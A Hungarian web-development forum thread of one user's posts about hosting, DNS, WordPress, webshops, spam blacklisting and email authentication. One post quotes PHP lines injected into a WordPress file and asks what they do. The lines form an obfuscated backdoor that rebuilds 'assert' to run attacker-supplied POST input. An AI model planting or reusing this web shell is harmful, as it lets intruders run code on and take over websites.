- Apple Watch
- Samsung Galaxy Z Flip5 - ami kint, az van bent
- Fotók, videók mobillal
- Poco X5 Pro - ránézésre jó
- Honor Magic6 Pro - kör közepén számok
- Xiaomi 13T és 13T Pro - nincs tétlenkedés
- VoLTE/VoWiFi
- Huawei Watch GT 5 Pro - egészség + stílus
- Android szakmai topik
- Samsung Unpacked: második generációs okosgyűrű és AR-szemüveg is jöhet
Új hozzászólás Aktív témák
-
Jinxb1rd
addikt
válasz CactuS #17049 üzenetére
Szörnyű, és most kezdek egy másik honlapot felépíteni, ugyanitt. Csak a wordpress van még felrakva de már 1,8mp ...
Évekig tesztelgettem a tárhelyeket, próbáltam minél olcsóbban kijönni mindig, de sose volt jó. Én speciel a rackforestnél állapodtam meg, de szerintem tényleg annyi a lényeg, hogy többet kell rászánni és olyan szolgáltatót keresni, ami nem reseller gyanús banda. Próbáltam rávenni a főnököt, hogy váltsunk, de most nem akar plusszba kiadni semmiét pénzt, max az új honlapoknál...We are only Stardust...
-
Jinxb1rd
addikt
Hm, ez a maxer az új kedvenc tárhely szolgáltatóm. Az hagyján hogy a TTFB 2,2 mp (de ez is már csak külön kérésre lett ennyi, előtte 10mp(!) volt ), de kérésünkre ezen úgy próbáltak tovább javítani, hogy a tájékoztatásunk nélkül bővítményeket töröltek ki a honlapunkból FTP-n keresztül.
Végül is csak hete óta dolgozunk rajta, ez teljesen rendben van így.[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Az ügyfelem webshop keretrencerek iránt érdeklődik, pl: shoprenter, shopify. Minél egyszerűbb, könnyen szerkeszthető rendszert akar.
Milyen lehetőségek jöhetnek szóba?
Én személy szerint rühellem ezeket, inkább dobnék össze Woocommerce-t de tényleg állítgatósabb lenne valszeg.We are only Stardust...
-
Jinxb1rd
addikt
-
Jinxb1rd
addikt
válasz Tatejkas #16385 üzenetére
Btw ahogy olvasom, lehet tényleg kell hozzá billing megadás, csak akkor se értem miért működik a másik honlapon még a dolog.
Illetve nekem rohadtul nem tetszik, hogy akárhol megadjam a bankkártya adataim. Mi az, hogy kötelez engem erre a google, miközben meg a google plus rendszerüket is nemrég feltörték?
We are only Stardust...
-
Jinxb1rd
addikt
válasz Tatejkas #16385 üzenetére
Akkor is ha nem lépem át a limitet? Addig nem is fog működni?
Szerk: most néztem, másik honlapomon meg működik, szóval ez biztos nem feltétel. Egyszerűen rohadtul nem értem, hogym iért működik az egyiken és a másikon meg miért nem.
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Valaki eltudná magyarázni, hogyan lehet a google maps-et használni az oldalakon? Mert már kiidegel, hogy 8000 féle variációt beírok a weblapcím korlátozáshoz köztük úgy is, ahogy le van írva, mégis a világért se akar működni ez a köcsög funkció.
Tehát mégegyszer: beírtam a példa szerint az oldalamat, https meg www variációkkal is, mégse működik. Miért?
We are only Stardust...
-
Jinxb1rd
addikt
SziasztoK!
Ha godaddy-nél van a domain nevem, hogy kell átállítani a DNS-ét, hogy a levelezés stb ne változzon, csak magát a weblapra mutató részt változtassam meg, hogy az egy másik szerverre mutasson?
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Idestova 9 éve jórészt szerződés nélkül dolgozok, most jött el sajnos a pillanat, hogy lehet le akarnak rázni anélkül, hogy a teljes munkadíjat kifizetnék (2-3 hete nem válaszolnak semmire). Jelenleg annyi előnyöm van, hogy a domain-hez van hozzáférésem, amit tudok állítani. Pl a levelező címét, ami fontos, pl. mondjuk a tárhelyemre irányíthatom, így bele léphetek abba stb.
Milyen lépéseket lehet tenni, hogy kikényszerítsem a kifizetésem és de ne legyen törvénybeütköző vagy ne lehessen érte beperelni? Mit lehet és mit nem? Ötletek?
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Szerintetek annyiban meg lehet oldani a gdpr cookie kezelést, hogy ha valaki belép a beállításokba, egyetlen opció legyen, hogy engedélyezi-e az összes cookie-t vagy sem, és ha nemre kattint, akkor törlöm az összes cookie-ját és átirányítom valahova máshova?
We are only Stardust...
-
-
Jinxb1rd
addikt
Jól látom, hogy nem lehet már mindenféle szarakodás nélkül Google API keyt szerezni, csak ha beregisztrálok, meg billing accountot adok hozzá? Ez most a módi, csak fizetéssel lehet majd használni pl a Google Mapsot?
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Sok domaint szerettem volna regisztrálni, de a dotroll már sokadszor cseszi fel az agyam, hogy lassú és elérhetetlen, ilyen 'waste my time' típusú szolgáltatást nyújt évek óta, szóval most jött el az idő, úgy döntöttem váltanék másra.
Tud valaki ajánlani más, megbízható céget, akik hasonló árakkal dolgoznak és hasonlóan konfigurálhatóak a domainek, ahogy kell?
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Ja de egyébként azért jöttem a fórumba, hogy megkérdezzem, hogy ti melyik frameworkot ajánlanátok most?
Laravel abszolút felejtős, az nem érdekel, eddig pedig Codeignitert használtam. Esetleg megéri Codeigniteresnek maradni? Phalcon-nal szemeztem még a sok közül.
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
válasz Tatejkas #15673 üzenetére
Én most váltottam dotroll-ról rackforest-re. Talán a legrosszabb szolgáltatóm volt eddig, főleg az oldalak betöltése volt vérlázítóan lassú, viszont a Rackforest most minden szempontból kimagaslóan jeleskedik, remélem így is marad.
MicroVPS túlságosan olcsó, valami ott tuti nem kóser. Vagy a későbbiekben nem lesz az...
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Nem konkrétan webprogramozás kérdés, de egész biztos itt vannak olyanok, akik tudják rá a választ:
Ha a gmailhez be volt kötve egy külső fiók imap-ként, akkor ha az a fiók megszűnik a szerveren, attól megmaradnak a levelek a gmailben?
Tudtommal igen, de biztosra szeretnék menni a tudásom illetően.
We are only Stardust...
-
Jinxb1rd
addikt
Tudtok valamit ajánlani, amivel át lehet nézetni a honlapok fájlait, hogy fertőződtek-e? Nem a sima víruskeresőre gondolok, hanem ami megnézi, hogy vannak-e kártékony programsorok a forrásokban.
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Wordpress honlapomon a Wordfence plugint jelzett egy változást az egyik fájlnál. Ezek a sorok lettek beszúrva. Szerintetek ez mit csinál?
<?php
$abc='http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$tab1='abc11';
$c2=explode($tab1,$abc);
if(count($c2)>1){
$c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);return;
}
?>We are only Stardust...
-
Jinxb1rd
addikt
Manapság milyen kötelezettségek vannak egy honlap esetén? Valamilyen adatokat kötelező feltüntetni?
We are only Stardust...
-
Jinxb1rd
addikt
Én is szar grafikus vagyok. Azért nem hirdettem már meg magam vagy három éve, illetve ezért akarna mindenki bekebelezni magához. Mert paintezek.
We are only Stardust...
-
Jinxb1rd
addikt
Első részben annyiban igazat adok, hogy szerintem is érdemes letiltani a frissítéseket, mert ha most jól szuperál az oldal, jól működik minden, akkor a hátam közepére nem kívánom, hogy a wordpress és a modulok össze-vissza frissüljenek, aztán megkeress az ügyfél, hogy valami baj van az oldallal. Az tényleg kérdéses, hogy a karbantartás mit takar, de nálam inkább szerveroldali dolgokat.
Második részhez több infó kellene, előzmény, mert ez így nagyon kiragadott szagú. Mi volt az első ajánlat és mi a második ajánlat. Nekem ebből az jön le, hogy elsőnek simán megcsinálták több kijelzőre css-sel, hogy ne essen szét, azt cső, másodikban meg bele akarnak vinni bootstrep-et, átírni a html kódot is, szóval modernebb megoldásokat alkalmazni, akkor nyilván nem ugyanaz a téma.
Harmadik kérdés: hogyan ellenőrizted le, mikkel, milyen módon?
We are only Stardust...
-
Jinxb1rd
addikt
Még nem találkoztam olyan template-tel, ami annyira hű de jó lett volna, hogy ne kelljen belenyúlni a mobilverzióba.
We are only Stardust...
-
Jinxb1rd
addikt
Én megvettem, mert most beindultak nálam a wordpress oldalak, amiknek többnyelvűeknek kell lenniük és qtranslate féle megoldások sose voltak 100%-osan jók.
Reménykedtem benne, hogy jó lesz és időt spórolok vele. Egyelőre nem is csalódtam benne, remekül szinkronizálja a tartalmakat egymással és mindent le tudok fordítani.
200 dollárért egyébként szerintem felesleges megvenni, 80 dollárért is bármennyi helyre felrakhatod, csak mindössze így egy évig kapod meg a frissítéseket. Megújítással is olyan 3-4 év múlva fogod elérni a 200 dolláros vételárat, addig meg lehet már más lesz a menő vagy már nem is weboldalakat fogok csinálni.
Ha már árakról van szó:
Kilátásban van, hogy egy város honlapját kell megcsinálni. Jól sejtem, hogy ilyen esetben lehet többet kérni egy átlagos honlapnál? Nem nagy város, mint Szeged vagy Pécs, de nem is kicsi.[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
válasz trisztan94 #14646 üzenetére
De nem is Magyarországra dolgozol.
(#14647) DNReNTi:
Ha értenél hozzá, tudnád, hogy egy egyszerűnek tűnő oldal nem egy napos kattintgatás. Simán tud több lenni, elég pár plusz kérés, megannyi levelezés és simán lesz 32 órás munka
Arról nem is beszélve, hogy egy normális sablon 60 dollár. Mondjuk az más kérdés, hogy ebbe az árba benne van-e, de ezenkívül vannak még pluginok, mait szintén ki kell fizetnie valakinek, pl wpml.
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
-
Jinxb1rd
addikt
SPAM problémákkal küszködök. Hogyan lehet kivédeni azt, hogy egy ügyfél által keltet spam probléma ne terjedjen ki más honlapokra is és azok mail fiókjaira is?
We are only Stardust...
-
Jinxb1rd
addikt
válasz snake1977 #14552 üzenetére
A legelső saját készítésű oldalamnál több ezer termék van egy oldalra rakva, page funkció nélkül ( ) és így se vészes a sávszél használat.
Egyébként a megacp-ről én is oda szándékolok költözni (tetszik a support, meg ahogy az egész rendszer működik például a domainek esetében), majd mesélhetnél milyen.
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
-
Jinxb1rd
addikt
Másik kérdés:
Egy ügyfelem (és időnként mindig valamelyik ) bekap valami vírust és mivel outlookkal szórakozik a gépén, ezért tudta nélkül spammelni kezd a nagy világba.
Én most beállítottam szépen, hogy gmailre rákötöttem a fiókot, jelszót változtattam stb használja mostantól azt. De hogyan tudom elintézni, hogy a spamlistákról lekerüljön a levél? Van erre valami technika, tipp? Valami ami végigellenőrzni a nagy kiszolgálókat?We are only Stardust...
-
Jinxb1rd
addikt
válasz grabber #14454 üzenetére
Referenciákat meg kell nézni és kipróbálni a honlapokat, hogy van-e rajtuk valami hiba, esetleg írni nekik, megkérdezni, kivel csináltatták és mik voltak a tapasztalatok.
ÁR:
- Mi a téma
- Célközönség
- Kinek kell a honlap
- Milyen fizetési módok vannak
- Milyen szállítási módok vannak
- Milyen funkciók kellenekJobban le kell írni, hogy mire van szükséged.
Ja és aki a te hozzászólásodra már ad valami árat, na az biztos nem profi.[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Ha veszek egy Wordpress sminket, akkor tudom, hogy jogilag nem lehetne több helyen használni, de lesz valami jelzése, azonosítója? Ami mondjuk kommunikál a fejlesztő szerverével, hogy na: ebből kettő is van.
Vagy mindenki ugyanazokat a fájlokat kapja letöltésnél?
We are only Stardust...
-
Jinxb1rd
addikt
válasz trisztan94 #14161 üzenetére
De akkor hogyhogy nem lepik el a 99design oldalt is?
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
válasz trisztan94 #14153 üzenetére
Gondolom ehhez már nem árt jól beszélni is angolul, nem csak jól írni.
We are only Stardust...
-
Jinxb1rd
addikt
Egyébként én életembe talán egy szerződést írtam, de az is csak a levegőbe, hogy legyen igazolható papírforma.
Szeretek veszélyesen élni, egyszer biztos megfogom égetni magam.We are only Stardust...
-
Jinxb1rd
addikt
válasz DNReNTi #14146 üzenetére
Ezek jó része a megbeszélés hiányából adódnak. Komolyan nem is került szóba a kártyás fizetés egy webshop esetén, nem is kérdeztetek rá?!
Kell valaki, aki ért az ügyfelekkel való kommunikációhoz és akkor nem lesz ilyen. Másrészt az ügyfélnek mindig vissza kell jelezni, akár csak írásban is (de inkább minimum képernyőtervekkel), hogy mi a helyzet, különben nyugtalan lesz.
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Biztosan, hiszen tud ennyizni. Én még nem.
Egyébként arra gondoltam, hogy valaki beszámolhatna a tapasztalatairól. Olvasni én is megtanultam, de néha az nem oldja meg a problémát, ha követed az ilyen egyszerű utasításokat. Visszaírt a tárhelyes, hogy nincs az ip feketelistán sehol. Na akkor most mi van?
...vagy ennyi?
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Valaki tudna segíteni nekem elmagyarázni, hogy ezzel mi a túrót tudok csinálni? Hogy mi ez egyáltalán és mik a megoldás felé vezető lépések?
Nagyon nem erősségem az e-mailküldési hibák megoldása.Ez a link van benne:
http://cgi.t-online.hu/bra02/mxtest.cgi?err=BLKLST&ip=85.25.91.175&list=xbl.spamhaus.org[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Köszönöm mindenkinek, sikerült beküldeni a nyomtatványom
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Valaki tudna nekem tippeket adni, milyen ovtj számokat érdemes felvenni egyéni vállalkozáshoz?
Jelenleg ez van felvéve, de nem tudom mit takar pontosan. Tárhelyet is akarok kiadni, domaint, pl.
620103 Weblap tervezése (webdizájn)We are only Stardust...
-
Jinxb1rd
addikt
Szintén. Nem tudom miben más, miben új. Először én se néztem meg a videót, de attól se lettem okosabb.
We are only Stardust...
-
Jinxb1rd
addikt
Valaki használ Komod Edit-et?
Én most frissítettem 8.5-re és nem tudom beállítani, hogy automatikusan segítsen kiegészíteni a kódot. Addig sikerült eljutnom, hogy tabot nyomogatva kiad mindenféle variációt, olyat is ami nem oda való.
Meg eddig ha kijelöltem egy változót, megmutatta az egész dokumentumban, hogy még hol található. Most már ezt se tudom beállítani.
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
Valakit érdekel egy Opencart-os project végállomása?
http://dev.hesztibor.hu/elettar
Április eleje óta nem jelentkezett az ügyfél. Most írt, hogy szeretné próbálgatni az oldalt, én viszont már nem kívánok vele foglalkozni. Maga a webshop rész majdnem elkészült, tesztelgetés, foltozgatás lenne még hátra. Plusz modulokat/oldalakat kértek: napi gondolatok, receptek, érdekességek és a szállítólevél (számlalevél mellé).
110.000 Ft-ét vállaltam, ebből 40.000-et kaptam meg. Természetesen már több munkám áll benne, de lemondtam a munkadíjról.
Érdekel valakit?
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
válasz trisztan94 #9335 üzenetére
Hát azért nem igazán. Feltöltöttem egy képet és csak szimplán jobban betömörítette. :/
We are only Stardust...
-
Jinxb1rd
addikt
Mert te ránéztél erre a honlapra és azt gondoltad:
Hm, ez aztán profi lehet, biztos évek óta ez a szakmája és rengeteg elégedett ügyféllel rendelkezhet, csak dolgozok már neki. Igaz, hogy bárki össze tud dobni egy ilyen honlapot 2 nap tanulással, de hát na, biztos nem volt ideje rá rendesen megcsinálni.Nem, engem nem kell figyelmeztetni, de azért kösz.
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
-
Jinxb1rd
addikt
-
Jinxb1rd
addikt
Most el akarom kezdeni a marketingezést Google féle hirdetésekkel, de már kapásból rosszul csináltam, mert beregisztráltam egy ügyfelem oldalát AdSense-hez .
Furcsa is volt nekem az űrlap... Remélem nem fogják elfogadni.
We are only Stardust...
-
Jinxb1rd
addikt
Valaki nem tudja, hogy webshopban kötelező-e a cikkszám féltüntetése? Mármint úgy értem a számlát is innen nyomtatják, én meg le akarom venni.
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Sitemapot akarok generáltatni és azt vettem észre, hogy szerinte létezik ilyen, hogy:
http://hoszigeteles-gipszkarton.hu/termekeink/termekeink/belteri-falfestekek
természetesen 'termekeink/'-ből csak egy kellene.
Tud valaki olyan eszközt, amivel rá tudok keresni, hogy hol talált ilyen linket a weboldalon?
Persze az is lehet, hogy a program dolgozik rosszul, ezt majd mindjárt letesztelem, de attól érdekelne valami linkereső dolog. Bármikor jól jöhet...
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
válasz Brown ügynök #7348 üzenetére
szerintem z-indexel be tudod állítani, hogy melyik takarja a másikat.
We are only Stardust...
-
Jinxb1rd
addikt
Rohadt jó ez a Magento, csak az a baj, hogy még egy rohadt terméket se tudtam megjeleníteni. Szóval köszönöm szépen az ajánlásokat!
We are only Stardust...
-
Jinxb1rd
addikt
válasz Speeedfire #7268 üzenetére
Ezért kell táblázatot használni, hogy mindenhol jó legyen. Elég idegesítő ez 2013-ban, de remélhetőleg egyszer már csak kitalálnak valamit...
We are only Stardust...
-
Jinxb1rd
addikt
válasz DeltaPower #7244 üzenetére
Igen, az fincsi lesz, de nem félek. Szeretem a kihívásokat és szerintem megvalósítható.
We are only Stardust...
-
Jinxb1rd
addikt
Sziasztok!
Egy ilyen jellegű webshopnak szeretnék nekiugrani:
Kérdésem az lenne, hogy milyen webshop motort ajánlanátok alá? Ugyanis a sima webáruházon kívül szükség lesz majd olyan dolgokra, mint bloggolás, napi gondolatok, illetve szeretnének szállítási levelet, amit én nem teljesen értek, hogy miért kell. Elvileg a kiállított számlákkal is tudja igazolni a futár, hogy nem lopott az áru nem? Mind1, egyelőre én nem láttam ilyen modult még egy webshopban sem (sőt, szállítási levelet se láttam ).
Amivel én sokat dolgoztam eddig az az Opencart, mást még nem próbáltam ki. Ti mit ajánlanátok?
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
válasz Speeedfire #7224 üzenetére
Én kiveszem a szövegeket mindig. Ez a legegyszerűbb
We are only Stardust...
-
Jinxb1rd
addikt
Valaki el tudja nekem magyarázni, hogyan lehet azt megoldani, hogy ha a honlapomról levelet küldenek az egyik gmail-es címemre, akkor a gmail automatikusan hitelesítse és ne dobjon figyelmeztetést (hogy lehetséges, hogy nem attól a feladót jött a levél, aki az üzenetet küldte)?
Link, ahonnan a leveleket lehet küldeni:
Ha így kapom meg az e-mailt nem kapok figyelmeztetést:
név: sfsdfsdfsd
e-mail: asdads@gdfg.hu
szöveg: sdsdfsdfHa normálisan kitölti valaki gmail-es címmel, akkor már kapok:
név: Túth Sándor
e-mail: tuthsandor@gmail.com
szöveg: blablablaA gmail ezt a megoldást írja erre a problémára:
A Gmail ellenőrzi, hogy az e-mailek megfelelően hitelesítve vannak-e. Kérjük, tegyen közzé egy SPF-rekordot, és használja domainnevét feladóként, vagy lássa el üzeneteit az Ön domainjéhez társított DKIM-aláírással.Elméletileg tegnap este beállítottam a c-panelbe egy spf rekordot a DNS zónáknál. de még mindig nem jó.
[ Szerkesztve ]
We are only Stardust...
-
-
Jinxb1rd
addikt
Ez a firefox féle betűmosás tényleg szörnyű
Nagyon maguk alatt vágják a fát.
Ui: ahogy látom, a jquery animáció is szépen szaggat.
[ Szerkesztve ]
We are only Stardust...
-
Jinxb1rd
addikt
válasz Sk8erPeter #6734 üzenetére
Ha többeknek problémájuk van ezzel, bizonyára javítani fogják, ergo a probléma megoldja saját magát.
We are only Stardust...
-
Jinxb1rd
addikt
válasz Speeedfire #6656 üzenetére
Ja, akkor úgy értette, hogy olyan belföldi szerver, ami külföldről is gyors elérést biztosít? Vagy úgy, hogy ne legyen külföldi, mert akkor itthon nem túl gyors?
We are only Stardust...
Új hozzászólás Aktív témák
Állásajánlatok
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest